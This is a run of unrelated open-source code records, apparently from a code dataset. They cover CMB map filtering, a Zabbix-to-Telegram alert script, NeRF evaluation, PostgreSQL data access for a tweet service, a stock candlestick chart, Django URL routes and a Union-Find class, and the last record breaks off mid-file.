in np.ndenumerate(axs):\n axs[aidxs].plot(ells, dells * cov_ell[aidxs[0],aidxs[1]], lw=0.5, color='black', ls=':')\n axs[0,0].set_ylim(0, 1e4)\n fig.savefig(opj(imgdir, 'ps_c_ell'))\n plt.close(fig)\n\n for idxs, ax in np.ndenumerate(axs):\n if idxs[0] == idxs[1]:\n ax.set_yscale('log')\n ax.set_ylim(ax.get_ylim())\n ax.plot(ells, dells * nl[idxs[0],idxs[1]] / b_ell[0] ** 2, lw=1, color='black')\n axs[0,0].set_ylim(0.1, 1e4)\n fig.savefig(opj(imgdir, 'ps_c_ell_log'))\n plt.close(fig)\n\n # Plot input sky signal.\n omap = curvedsky.make_projectable_map_by_pos(\n [[np.pi/2, -np.pi/2],[-np.pi, np.pi]], lmax, dims=(alm.shape[0],))\n omap = curvedsky.alm2map(alm, omap)\n plot = enplot.plot(omap, colorbar=True, font_size=50, grid=False, range='250:5', downgrade=4)\n enplot.write(opj(imgdir, 'alm_in'), plot)\n\n if not test_conv:\n # Plot input data.\n alm_data = alm.copy()\n sht.map2alm(imap, alm, minfo, ainfo, [0, 2])\n curvedsky.alm2map(alm, omap, ainfo=ainfo)\n plot = enplot.plot(omap, colorbar=True, font_size=50, grid=False, range='250:5', downgrade=4)\n enplot.write(opj(imgdir, 'imap'), plot)\n \n # Plot result\n omap = curvedsky.alm2map(solver.get_wiener(), omap)\n plot = enplot.plot(omap, colorbar=True, font_size=50, grid=False, range='250:5', downgrade=4)\n if draw_constr:\n enplot.write(opj(imgdir, 'alm_constr'), plot)\n else:\n enplot.write(opj(imgdir, 'alm_out'), plot)\n\n if not draw_constr:\n omap = curvedsky.alm2map(solver.get_icov(), omap)\n plot = enplot.plot(omap, colorbar=True, font_size=50, grid=False, downgrade=4)\n enplot.write(opj(imgdir, 'alm_icov'), plot)\n\n if test_conv:\n omap = curvedsky.alm2map(solver.get_wiener() - alm, omap)\n for pidx in range(3):\n plot = enplot.plot(omap[pidx], colorbar=True, font_size=50, grid=False, downgrade=4)\n enplot.write(opj(imgdir, f'alm_diff_{pidx}'), plot)\n\n b_out = solver.A(solver.x)\n omap_b_out = curvedsky.alm2map(b_out, omap.copy())\n omap_b_in = curvedsky.alm2map(solver.b0, omap.copy())\n omap_b_diff = curvedsky.alm2map(b_out - solver.b0, omap.copy())\n\n if not draw_constr:\n\n for pidx in range(alm.shape[0]):\n\n plot = enplot.plot(omap_b_out[pidx], colorbar=True, grid=False, font_size=50, downgrade=4)\n enplot.write(opj(imgdir, 'b_out_{}'.format(pidx)), plot)\n\n plot = enplot.plot(omap_b_in[pidx], colorbar=True, grid=False, font_size=50, 
downgrade=4)\n enplot.write(opj(imgdir, 'b_{}'.format(pidx)), plot)\n\n plot = enplot.plot(omap_b_diff[pidx], colorbar=True, grid=False, font_size=50, downgrade=4)\n enplot.write(opj(imgdir, 'b_diff_{}'.format(pidx)), plot)\n\n # Save the output.\n if not test_conv:\n map_utils.write_map(opj(odir, 'imap'), imap, minfo)\n hp.write_alm(opj(odir, 'alm_in.fits'), alm, overwrite=True)\n if not draw_constr:\n hp.write_alm(opj(odir, 'alm_icov.fits'), solver.get_icov(), overwrite=True)\n hp.write_alm(opj(odir, 'alm_out.fits'), solver.get_wiener(), overwrite=True)\n if draw_constr:\n hp.write_alm(opj(odir, 'alm_constr.fits'), solver.get_wiener(), overwrite=True)\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('basedir', type=str,\n help='Output directory')\n parser.add_argument('--draw-constr', action='store_true',\n help='Draw a constrained realization')\n parser.add_argument('--test-conv', action='store_true',\n help='Replace b with A(x) for known LCDM x.')\n parser.add_argument('--niter-cg', type=int, default=20, \n help='Number of CG steps with nested CG as masked prec.')\n parser.add_argument('--niter-mg', type=int, default=40, \n help='Number of CG steps with multigrid as masked prec.')\n parser.add_argument('--no-masked-prec', action='store_true', \n help='Do not use the preconditioners for masked pixels.')\n parser.add_argument('--pol-mg', action='store_true', \n help='Use the multigrid precondioner for polarization as well.')\n parser.add_argument('--use-prec-harm', action='store_true', \n help='Use the harmonic preconditioner instead of the pseudo inverse.')\n parser.add_argument('--noise-scaling', type=float, \n help='Scale noise covariance by this number')\n parser.add_argument('--no-beam', action='store_true', \n help='Turn off beam.')\n parser.add_argument('--lmax-masked-cg', type=int, default=1500,\n help=\"lmax_masked_cg\")\n parser.add_argument('--write-steps', action='store_true',\n help=\"Write x to disk each step.\")\n args = parser.parse_args()\n\n print(args)\n\n main(args.basedir, draw_constr=args.draw_constr, test_conv=args.test_conv,\n niter_cg=args.niter_cg, niter_mg=args.niter_mg, no_masked_prec=args.no_masked_prec,\n pol_mg=args.pol_mg, use_prec_harm=args.use_prec_harm, noise_scaling=args.noise_scaling,\n no_beam=args.no_beam, lmax_masked_cg=args.lmax_masked_cg, write_steps=args.write_steps)\n","repo_name":"AdriJD/optweight","sub_path":"scripts/paper/planck_filter_pix.py","file_name":"planck_filter_pix.py","file_ext":"py","file_size_in_byte":18973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20945802053","text":"from dataclasses import dataclass\n\n\n@dataclass\nclass Peripheral:\n wiki_spec_name: str\n gsm_field: str\n gsm_name: str = None\n\n def __post_init__(self):\n if self.gsm_name is not None:\n return\n self.gsm_name = self.wiki_spec_name.lower()\n\n\nPERIPHERALS = [\n Peripheral('A-GPS', 'gps'),\n Peripheral('Accelerometer', 'sensors'),\n Peripheral('Barometer', 'sensors'),\n Peripheral('BeiDou', 'gps', 'BDS'),\n Peripheral('Compass', 'sensors'),\n Peripheral('FM Radio', 'radio'),\n Peripheral('Fingerprint', 'sensors'),\n Peripheral('Galileo', 'gps'),\n Peripheral('GLONASS', 'gps'),\n Peripheral('GPS', 'gps', 'Yes'),\n Peripheral('NAVIC', 'gps'),\n Peripheral('SBAS', 'gps'),\n Peripheral('QZSS', 'gps'),\n Peripheral('Gesture sensor', 'sensors', 'gesture'),\n Peripheral('Gyroscope', 'sensors', 'Gyro'),\n Peripheral('MHL', 'usb'),\n Peripheral('MHL 2', 
'usb'),\n Peripheral('NFC', 'nfc', 'Yes'),\n Peripheral('Proximity sensor', 'sensors', 'proximity'),\n]\n","repo_name":"harryyoud/gsmarena_to_wiki","sub_path":"peripherals.py","file_name":"peripherals.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75244590568","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom urllib import parse, request, error\nfrom socket import timeout\nimport logging\nimport sys\nimport os\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nhandler = logging.FileHandler('/var/log/zabbix/telegram.log')\nhandler.setLevel(logging.INFO)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\n\ndef send_message(message, subject):\n global result\n\n proxy = 'http://name:password@ip:port'\n\n os.environ['http_proxy'] = proxy\n os.environ['HTTP_PROXY'] = proxy\n os.environ['https_proxy'] = proxy\n os.environ['HTTPS_PROXY'] = proxy\n\n token = 'token'\n url = \"https://api.telegram.org/bot\" + token + \"/sendMessage\"\n params = parse.urlencode({\"chat_id\": -000, \"text\": message})\n params = params.encode('utf-8')\n\n try:\n\n logger.info('Subject = %s, MESSAGE = %s', subject, message)\n result = request.urlopen(url, params).read()\n logger.info('RESULT = %s', result)\n\n except error.HTTPError as e:\n logger.info('HTTP ERROR = %s', e)\n except error.URLError as e:\n logger.info('URL ERROR = %s', e)\n except Exception as e:\n logger.info('Exception = %s', e, result)\n except timeout:\n logger.info('socket timed out - URL %s', url)\n else:\n logger.info('Access successful.')\n\n\nif __name__ == \"__main__\":\n subj = sys.argv[1]\n message_list = []\n message_string = None\n\n for text_item in range(3, len(sys.argv)):\n message_list.append(sys.argv[text_item])\n\n message_string = ' '.join(str(element) for element in message_list)\n send_message(message_string, subj)\n","repo_name":"Barichpok/zabbix","sub_path":"send_message.py","file_name":"send_message.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27933004424","text":"import os, sys\r\nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\r\n\r\nfrom pathlib import Path\r\nimport argparse\r\nimport json\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom torch.utils.data import DataLoader\r\nfrom datasets.shapenet import build_shapenet\r\nfrom models.nerf import build_nerf\r\nfrom utils.shape_video import create_360_video\r\nfrom models.rendering import get_rays_shapenet, sample_points, volume_render\r\nimport torch.nn as nn\r\nimport cv2 as cv\r\n\r\n\r\ndef test_time_optimize(args, model, optim, imgs, poses, hwf, bound, idx):\r\n \"\"\"\r\n test-time-optimize the meta trained model on available views\r\n \"\"\"\r\n pixels = imgs.reshape(-1, 3)\r\n\r\n generate_samplimg_pixels = True # means load sampling_pixels True\r\n\r\n # get groud truth image's rays_o & rays_d\r\n # i think rays_d is defined as the rays direction, along(x-direction, y-direction, z-direction)\r\n rays_o, rays_d = get_rays_shapenet(hwf, poses)\r\n rays_o, rays_d = rays_o.reshape(-1, 3), rays_d.reshape(-1, 3)\r\n\r\n # num_rays is 128*128, which is the number of rays\r\n num_rays = rays_d.shape[0]\r\n\r\n if generate_samplimg_pixels:\r\n # store each instance's sampling pixels\r\n indices_range = []\r\n else:\r\n 
indices_range = torch.load('./sampling_pixels/1v_128p/instance_{}.pt'.format(idx+1))\r\n\r\n for step in range(args.tto_steps):\r\n # 128*128 rays are too many, so that we should sample a little rays for calculate loss\r\n if generate_samplimg_pixels:\r\n indices = torch.randint(num_rays, size=[args.tto_batchsize * 8])\r\n else:\r\n indices = indices_range[step]\r\n \r\n raybatch_o, raybatch_d = rays_o[indices], rays_d[indices]\r\n # pixelbatch is the sample_pixels in one image\r\n pixelbatch = pixels[indices] \r\n t_vals, xyz = sample_points(raybatch_o, raybatch_d, bound[0], bound[1],\r\n args.num_samples, perturb=True)\r\n \r\n if generate_samplimg_pixels:\r\n indices_range.append(indices)\r\n \r\n optim.zero_grad()\r\n rgbs, sigmas = model(xyz)\r\n colors = volume_render(rgbs, sigmas, t_vals, white_bkgd=True)\r\n loss = F.mse_loss(colors, pixelbatch)\r\n loss.backward()\r\n optim.step()\r\n \r\n # store the indices\r\n if generate_samplimg_pixels:\r\n torch.save(indices_range, './sampling_pixels/1v_512p/instance_{}.pt'.format(idx+1))\r\n\r\ndef report_result(args, model, imgs, poses, hwf, bound):\r\n \"\"\"\r\n report view-synthesis result on heldout views\r\n \"\"\"\r\n ray_origins, ray_directions = get_rays_shapenet(hwf, poses)\r\n\r\n view_psnrs = []\r\n for img, rays_o, rays_d in zip(imgs, ray_origins, ray_directions):\r\n rays_o, rays_d = rays_o.reshape(-1, 3), rays_d.reshape(-1, 3)\r\n t_vals, xyz = sample_points(rays_o, rays_d, bound[0], bound[1],\r\n args.num_samples, perturb=False)\r\n \r\n synth = []\r\n num_rays = rays_d.shape[0]\r\n with torch.no_grad():\r\n for i in range(0, num_rays, args.test_batchsize):\r\n rgbs_batch, sigmas_batch = model(xyz[i:i+args.test_batchsize])\r\n color_batch = volume_render(rgbs_batch, sigmas_batch,\r\n t_vals[i:i+args.test_batchsize],\r\n white_bkgd=True)\r\n synth.append(color_batch)\r\n synth = torch.cat(synth, dim=0).reshape_as(img)\r\n error = F.mse_loss(img, synth)\r\n psnr = -10*torch.log10(error)\r\n view_psnrs.append(psnr)\r\n \r\n scene_psnr = torch.stack(view_psnrs).mean()\r\n return scene_psnr\r\n\r\n\r\ndef test():\r\n parser = argparse.ArgumentParser(description='shapenet few-shot view synthesis')\r\n parser.add_argument('--config', type=str, default='./configs/shapenet/chairs.json',\r\n help='config file for the shape class (cars, chairs or lamps)') \r\n parser.add_argument('--weight-path', type=str, default='./model_weight/model_1/model_1_meta_epoch15.pth',\r\n help='path to the meta-trained weight file')\r\n args = parser.parse_args()\r\n\r\n with open(args.config) as config:\r\n info = json.load(config)\r\n for key, value in info.items():\r\n args.__dict__[key] = value\r\n\r\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n test_set = build_shapenet(image_set=\"test\", dataset_root=args.dataset_root,\r\n splits_path=args.splits_path,\r\n num_views=args.tto_views+args.test_views)\r\n test_loader = DataLoader(test_set, batch_size=1, shuffle=False)\r\n\r\n model = build_nerf(args)\r\n model.to(device)\r\n\r\n # use multiple GPU to train the model\r\n if torch.cuda.device_count() > 1:\r\n model = nn.DataParallel(model)\r\n\r\n checkpoint = torch.load(args.weight_path, map_location=device)\r\n meta_state = checkpoint['meta_model_state_dict']\r\n\r\n savedir = Path(\"./videos_1v_wo\")\r\n savedir.mkdir(exist_ok=True)\r\n \r\n test_psnrs = []\r\n for idx, (imgs, poses, hwf, bound) in enumerate(test_loader):\r\n imgs, poses, hwf, bound = imgs.to(device), poses.to(device), hwf.to(device), 
bound.to(device)\r\n        imgs, poses, hwf, bound = imgs.squeeze(), poses.squeeze(), hwf.squeeze(), bound.squeeze()\r\n        \r\n        # for i in range(imgs.shape[0]):\r\n        #     mae_img = imgs[i].cpu().numpy()\r\n        #     cv.imwrite(f\"mae_test/shapenet_{i}.jpg\", mae_img)\r\n\r\n        tto_imgs, test_imgs = torch.split(imgs, [args.tto_views, args.test_views], dim=0)\r\n        tto_poses, test_poses = torch.split(poses, [args.tto_views, args.test_views], dim=0)\r\n        \r\n        # load model weights that were saved from a single-GPU model\r\n        if isinstance(model, torch.nn.DataParallel):\r\n            model.module.load_state_dict(meta_state)\r\n        else:\r\n            model.load_state_dict(meta_state)\r\n\r\n        optim = torch.optim.SGD(model.parameters(), args.tto_lr)\r\n\r\n        test_time_optimize(args, model, optim, tto_imgs, tto_poses, hwf, bound, idx)\r\n        scene_psnr = report_result(args, model, test_imgs, test_poses, hwf, bound)\r\n\r\n        # create_360_video(args, model, hwf, bound, device, idx+1, savedir)\r\n        \r\n        print(f\"scene {idx+1}, psnr:{scene_psnr:.3f}, video created\")\r\n        test_psnrs.append(scene_psnr)\r\n\r\n        # write psnr to file\r\n        with open('./videos_1v_wo/psnr.txt','a') as f:\r\n            f.write(\"video_{}: {}\\n\".format(idx+1, scene_psnr.cpu().numpy()))\r\n        \r\n    test_psnrs = torch.stack(test_psnrs)\r\n    print(\"----------------------------------\")\r\n    print(f\"test dataset mean psnr: {test_psnrs.mean():.3f}\")\r\n\r\n\r\nif __name__ == '__main__':\r\n    test()","repo_name":"yuchen-ji/pseudo-nerf","sub_path":"shapenet_test.py","file_name":"shapenet_test.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12894196276","text":"import logging\nfrom datetime import datetime\nfrom typing import Optional, Iterable, List, Union, Callable\n\nimport pg8000\nfrom flask import current_app\n\nfrom seventweets import db\nfrom seventweets.db import (\n    TwResp, NdResp, _T,\n    TWEET_COLUMN_ORDER, NODE_COLUMN_ORDER,\n)\n\nlogger = logging.getLogger(__name__)\nDbCallback = Callable[[pg8000.Cursor], _T]\n\n\nclass Database(pg8000.Connection):\n    \"\"\"\n    Thin wrapper around `pg8000.Connection` that allows executing queries\n    on database and makes sure that connection is in valid state by\n    performing commit and rollback when appropriate.\n    \"\"\"\n\n    def __init__(self):\n        super(Database, self).__init__(\n            user=current_app.config['ST_DB_USER'],\n            host=current_app.config['ST_DB_HOST'],\n            unix_sock=None,\n            port=int(current_app.config['ST_DB_PORT']),\n            database=current_app.config['ST_DB_NAME'],\n            password=current_app.config['ST_DB_PASS'],\n            ssl=False,\n            timeout=None,\n        )\n\n    def test_connection(self):\n        \"\"\"\n        Performs trivial query on database to check if connection is\n        successful. If not, this will raise an exception.\n        \"\"\"\n        try:\n            self.do(lambda cur: cur.execute('SELECT 1'))\n        except Exception:\n            logger.critical('Unable to execute query on database.')\n            raise\n\n    def cleanup(self):\n        try:\n            self.close()\n        except pg8000.core.InterfaceError:\n            # this exception is raised if db is already closed, which will\n            # happen if class is used as context manager\n            pass\n\n    def do(self, fn: DbCallback) -> _T:\n        \"\"\"\n        Executes provided fn and gives it cursor to work with.\n\n        Cursor will automatically be closed after, no matter what the result of\n        execution is. Return value is whatever `fn` returns.\n\n        After each operation, commit is performed if no exception is raised.\n        If exception is raised - the transaction is rolled back.\n\n        :param fn:\n            Function to execute. 
It has to accept one argument, cursor that it\n            will use to communicate with database.\n        :return: Whatever `fn` returns\n        \"\"\"\n        cursor = self.cursor()\n        try:\n            res = fn(cursor)\n            self.commit()\n            return res\n        except Exception:\n            self.rollback()\n            raise\n        finally:\n            cursor.close()\n\n\nclass Operations(db.Operations):\n    ################################################\n    # Tweet related methods\n    ################################################\n\n    @staticmethod\n    def get_all_tweets(cursor: pg8000.Cursor) -> Iterable[TwResp]:\n        \"\"\"\n        Returns all tweets from database.\n\n        :param cursor: Database cursor.\n        :return: All tweets from database.\n        \"\"\"\n        cursor.execute(f'''\n            SELECT {TWEET_COLUMN_ORDER}\n            FROM tweets\n            ORDER BY created_at DESC\n        ''')\n        return cursor.fetchall()\n\n    @staticmethod\n    def get_tweet(id_: int, cursor: pg8000.Cursor) -> TwResp:\n        \"\"\"\n        Returns single tweet from database.\n        :param id_: ID of tweet to get.\n        :param cursor: Database cursor.\n        :return: Tweet with provided ID.\n        \"\"\"\n        cursor.execute(f'''\n            SELECT {TWEET_COLUMN_ORDER}\n            FROM tweets WHERE id=%s;\n        ''', (id_,))\n        return cursor.fetchone()\n\n    @staticmethod\n    def insert_tweet(tweet: str, cursor: pg8000.Cursor) -> TwResp:\n        \"\"\"\n        Inserts new tweet and returns id of the created row.\n\n        :param tweet: Content of the tweet to add.\n        :param cursor: Database cursor.\n        :return: ID of the tweet that was created.\n        \"\"\"\n        cursor.execute(f'''\n            INSERT INTO tweets (tweet) VALUES (%s)\n            RETURNING {TWEET_COLUMN_ORDER};\n        ''', (tweet,))\n        return cursor.fetchone()\n\n    @staticmethod\n    def modify_tweet(id_: int, new_content: str,\n                     cursor: pg8000.Cursor) -> TwResp:\n        \"\"\"\n        Updates tweet content.\n\n        :param id_: ID of tweet to update.\n        :param new_content: New tweet content.\n        :param cursor: Database cursor.\n        :return:\n            Tweet that was updated, if tweet with provided ID was found, None\n            otherwise.\n        \"\"\"\n        cursor.execute(f'''\n            UPDATE tweets SET\n                tweet=%s,\n                modified_at=%s\n            WHERE id=%s\n            RETURNING {TWEET_COLUMN_ORDER};\n        ''', (new_content, datetime.utcnow(), id_))\n        return cursor.fetchone()\n\n    @staticmethod\n    def delete_tweet(id_: int, cursor: pg8000.Cursor) -> bool:\n        \"\"\"\n        Deletes tweet with provided ID from database.\n\n        :param id_: ID of tweet to delete.\n        :param cursor: Database cursor.\n        :return:\n            Boolean indicating if tweet with ID was deleted (False if tweet\n            does not exist).\n        \"\"\"\n        cursor.execute('''\n            DELETE FROM tweets where id=%s\n        ''', (id_,))\n        return cursor.rowcount > 0\n\n    @staticmethod\n    def create_retweet(server: str, ref: str, cursor: pg8000.Cursor) -> TwResp:\n        \"\"\"\n        Creates retweet in database that references server and tweet ID\n        provided in parameters.\n\n        :param server: Server name of original tweet.\n        :param ref: Tweet reference (ID) on original server.\n        :param cursor: Database cursor.\n        :return: Newly created tweet.\n        \"\"\"\n        cursor.execute(f'''\n            INSERT INTO tweets (type, reference)\n            VALUES (%s, %s)\n            RETURNING {TWEET_COLUMN_ORDER};\n        ''', ('retweet', f'{server}#{ref}'))\n        return cursor.fetchone()\n\n    @staticmethod\n    def search_tweets(content: Optional[str], from_created: Optional[datetime],\n                      to_created: Optional[datetime],\n                      from_modified: Optional[datetime],\n                      to_modified: Optional[datetime],\n                      retweet: Optional[bool],\n                      cursor: pg8000.Cursor) -> Iterable[TwResp]:\n        \"\"\"\n        :param content: Content to search in tweet.\n        :param from_created: Start time for tweet creation.\n        :param to_created: End time for tweet creation.\n        :param from_modified:\n            Start time for 
tweet modification.\n :param to_modified:\n End time for tweet modification.\n :param retweet:\n Flag indication if retweet or original tweets should be searched.\n :param cursor: Database cursor.\n \"\"\"\n where: List[str] = []\n params: List[Union[str, datetime]] = []\n if content is not None:\n where.append('tweet ILIKE %s')\n params.append(f'%{content}%')\n if from_created is not None:\n where.append('created_at > %s')\n params.append(from_created)\n if to_created is not None:\n where.append('created_at < %s')\n params.append(to_created)\n if from_modified is not None:\n where.append('modified_at > %s')\n params.append(from_modified)\n if to_modified is not None:\n where.append('modified_at < %s')\n params.append(to_modified)\n if retweet is not None:\n where.append('type = %s')\n params.append('retweet')\n\n where_clause = 'WHERE ' + ' AND '.join(where) if len(where) > 0 else ''\n\n cursor.execute(f'''\n SELECT {TWEET_COLUMN_ORDER}\n FROM tweets\n {where_clause}\n ORDER BY created_at DESC\n ''', tuple(params))\n return cursor.fetchall()\n\n @staticmethod\n def count_tweets(type_: str, cursor: pg8000.Cursor) -> int:\n \"\"\"\n Returns number of tweets of specified type.\n\n :param type_: Type of tweet to count.\n :param cursor: Database cursor.\n \"\"\"\n where = ''\n params = []\n if type_:\n where = 'WHERE type=%s'\n params.append(type_)\n cursor.execute(f'''\n SELECT count(*)\n FROM tweets\n {where}\n ''', tuple(params))\n return cursor.fetchone()[0]\n\n ################################################\n # Node related methods\n ################################################\n\n @staticmethod\n def get_all_nodes(cursor: pg8000.Cursor) -> Iterable[NdResp]:\n \"\"\"\n :param cursor: Database cursor.\n :return: All nodes from database.\n \"\"\"\n cursor.execute(f'''\n SELECT {NODE_COLUMN_ORDER}\n FROM nodes\n ORDER BY last_checked_at;\n ''')\n return cursor.fetchall()\n\n @staticmethod\n def insert_node(name: str, address: str, cursor: pg8000.Cursor) -> NdResp:\n \"\"\"\n Inserts new nodes to database.\n\n :param name: Name of new node.\n :param address: Address of new node.\n :param cursor: Database cursor.\n :return: Node that was inserted.\n \"\"\"\n cursor.execute(f'''\n INSERT INTO nodes (name, address)\n VALUES (%s, %s)\n RETURNING {NODE_COLUMN_ORDER};\n ''', (name, address))\n return cursor.fetchone()\n\n @staticmethod\n def get_node(name: str, cursor: pg8000.Cursor) -> NdResp:\n \"\"\"\n :param name: Name of the node to get.\n :param cursor: Database cursor.\n :return: Node with provided name.\n \"\"\"\n cursor.execute(f'''\n SELECT {NODE_COLUMN_ORDER}\n FROM nodes\n WHERE name=%s;\n ''', (name,))\n return cursor.fetchone()\n\n @staticmethod\n def update_node(name: str, address: str, cursor: pg8000.Cursor) -> NdResp:\n \"\"\"\n Updates existing node.\n\n :param name: Name of the node to update.\n :param address: New address to set for the node.\n :param cursor: Database cursor.\n :return: Node that was updated.\n \"\"\"\n cursor.execute(f'''\n UPDATE nodes\n SET\n address = %s\n WHERE\n name = %s\n RETURNING {NODE_COLUMN_ORDER};\n ''', (address, name))\n return cursor.fetchone()\n\n @staticmethod\n def delete_node(name: str, cursor: pg8000.Cursor) -> bool:\n \"\"\"\n Deletes node from the database.\n\n :param name: Name of the node to delete.\n :param cursor: Database cursor.\n :return:\n Flag indicating if node was deleted or not. 
It is possible that\n            node was not deleted if it was not found.\n        \"\"\"\n        cursor.execute(f'''\n            DELETE FROM nodes\n            WHERE name = %s;\n        ''', (name,))\n        return cursor.rowcount > 0\n\n    @staticmethod\n    def delete_all_nodes(cursor: pg8000.Cursor) -> bool:\n        \"\"\"\n        Deletes all nodes from the database.\n        Only used when joining a network for updating the stale node list.\n\n        :param cursor: Database cursor.\n        :return:\n            Flag indicating if nodes were deleted or not. It is possible that\n            nodes weren't deleted if the list was previously empty.\n        \"\"\"\n        cursor.execute(f'''\n            DELETE FROM nodes;''')\n        return cursor.rowcount > 0\n","repo_name":"sbg/seventweets","sub_path":"seventweets/db/backends/pg.py","file_name":"pg.py","file_ext":"py","file_size_in_byte":11359,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74397724967","text":"import os\nimport sys\nimport platform\nimport datetime as dt\nimport numpy as np\nimport matplotlib.pyplot as mp\nimport matplotlib.dates as md\n\n\ndef dmy2ymd(dmy):\n    return dt.datetime.strptime(str(dmy, encoding='utf-8'),\n                                '%d-%m-%Y').date().strftime('%Y-%m-%d')\n\n\ndef read_data(filename):\n    dates, opening_price, highest_price,\\\n        lowest_price, close_price = np.loadtxt(\n            filename,\n            delimiter=',',\n            usecols=(1, 3, 4, 5, 6),\n            unpack=True,\n            dtype=np.dtype('M8[D], f8, f8, f8, f8'),\n            converters={1: dmy2ymd})\n    # type of dates is python_datetime\n\n    # print(dates)\n    return dates, opening_price, highest_price,\\\n        lowest_price, close_price\n\n\ndef init_chart(first_day, last_day):\n    mp.gcf().set_facecolor(np.ones(3) * 240 / 255)\n    mp.title('Candlestick Chart', fontsize=20)\n    mp.xlabel('Trading Days From %s To %s' % (\n        first_day.astype(md.datetime.datetime).strftime('%d-%m-%Y'),\n        last_day.astype(md.datetime.datetime).strftime('%d-%m-%Y')),\n        fontsize=14)\n    mp.ylabel('Stock Price (USD) Of Apple Inc.', fontsize=14)\n\n    # configure the ticks\n    # get current axes\n    ax = mp.gca()\n    # set the major tick locator (weekly, on Mondays)\n    ax.xaxis.set_major_locator(md.WeekdayLocator(byweekday=md.MO))\n    # set the minor tick locator (daily)\n    ax.xaxis.set_minor_locator(md.DayLocator())\n    # set the display format of the major ticks\n    ax.xaxis.set_major_formatter(md.DateFormatter('%d-%m-%Y'))\n\n    # set where the ticks are displayed\n    mp.tick_params(which='both',\n                   top=True,\n                   right=True,\n                   labelright=True,\n                   labelsize=10)\n    mp.grid(linestyle=':')\n\n\ndef draw_chart(dates, opening_price, highest_price,\n               lowest_price, close_price):\n    # reset dates type to md.datetime.datetime\n    dates = dates.astype(md.datetime.datetime)\n    up = close_price - opening_price >= 1e-2\n    down = opening_price - close_price >= 1e-2\n\n    # up days: red edge, white body; down days: green edge, green body; flat days: black\n    # fill colors, each element is three floats (r, g, b), 4 bytes each\n    fc = np.zeros(dates.size, dtype='3f4')\n    # set the fill color to white for up days and green for down days\n    fc[up], fc[down] = (1, 1, 1), (0, 0.5, 0)\n    # edge colors\n    ec = np.zeros(dates.size, dtype='3f4')\n    ec[up], ec[down] = (1, 0, 0), (0, 0.5, 0)\n\n    # mp.bar(x position, height, width, bottom)\n    # wicks (high-low shadow lines)\n    mp.bar(dates, highest_price - lowest_price, 0,\n           lowest_price, align='center', color=fc, edgecolor=ec)\n    # candle bodies\n    mp.bar(dates, close_price - opening_price, 0.8,\n           opening_price, align='center', color=fc, edgecolor=ec)\n\n    mp.gcf().autofmt_xdate()\n\n\ndef show_chart():\n    # setting biggest width and height of window\n    # mng = mp.get_current_fig_manager()\n    # if 'Windows' in platform.system():\n    #     mng.window.state()\n    # else:\n    #     size = mng.window.maximumSize()\n    #     width = size.width()\n    #     height = size.height()\n    #     mng.resize(width, height)\n    mp.show()\n\n\ndef main(argc, argv, envp):\n    dates, opening_price, highest_price,\\\n        lowest_price, 
close_price = read_data('./data/data/aapl.csv')\n    # print(dates.dtype)\n    init_chart(dates[0], dates[-1])\n    draw_chart(dates, opening_price, highest_price,\n               lowest_price, close_price)\n    show_chart()\n    return 0\n\n\nif __name__ == '__main__':\n    # main(len(sys.argv), sys.argv, os.environ)\n    sys.exit(main(len(sys.argv), sys.argv, os.environ))","repo_name":"zhnin/mypython","sub_path":"ml/cs.py","file_name":"cs.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3719671451","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n\n    path('', views.index, name='index'),\n    path('index_user', views.index_user, name='index_user'),\n    path('login', views.login_user, name='login'),\n    path('logout', views.logout_user, name='logout'),\n    path('register', views.register, name='register'),\n    path('animal', views.animal, name='animal'),\n    path('animal_user', views.animal_user, name='animal_user'),\n    path('add_animal', views.add_animal, name='add_animal'),\n    path('allanimal',views.allanimal, name='allanimal'),\n\n    #path('/', views.detail, name='detail'),\n    #path('/results/', views.results, name='results'),\n    #path('/vote/', views.vote, name='vote'),\n]","repo_name":"Tanung/pythonanywhere","sub_path":"mywed/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31637231198","text":"# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# planning ? min / implementation ? min / debugging ? min\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nimport sys\nread = sys.stdin.buffer.read\nreadline = sys.stdin.buffer.readline\nreadlines = sys.stdin.buffer.readlines\nsys.setrecursionlimit(10**9)\n\nclass UnionFind():\n    def __init__(self, n):\n        self.n = n\n        self.parents = [-1] * n\n\n    def find(self,x):\n        if(self.parents[x] < 0):\n            return x\n        self.parents[x] = self.find(self.parents[x])\n        return self.parents[x]\n\n    def size(self, x):\n        return self.parents[ self.find(x) ] * -1\n\n    def same(self, x, y):\n        x_root = self.find(x)\n        y_root = self.find(y)\n        return (x_root == y_root)\n\n    def union(self,x,y):\n        x_root = self.find(x)\n        y_root = self.find(y)\n        if(x_root == y_root):\n            return\n\n        if( self.parents[x_root] <= self.parents[y_root] ):\n            self.parents[x_root] += self.parents[y_root]\n            self.parents[y_root] = x_root\n        else:\n            self.parents[y_root] += self.parents[x_root]\n            self.parents[x_root] = y_root\n\n    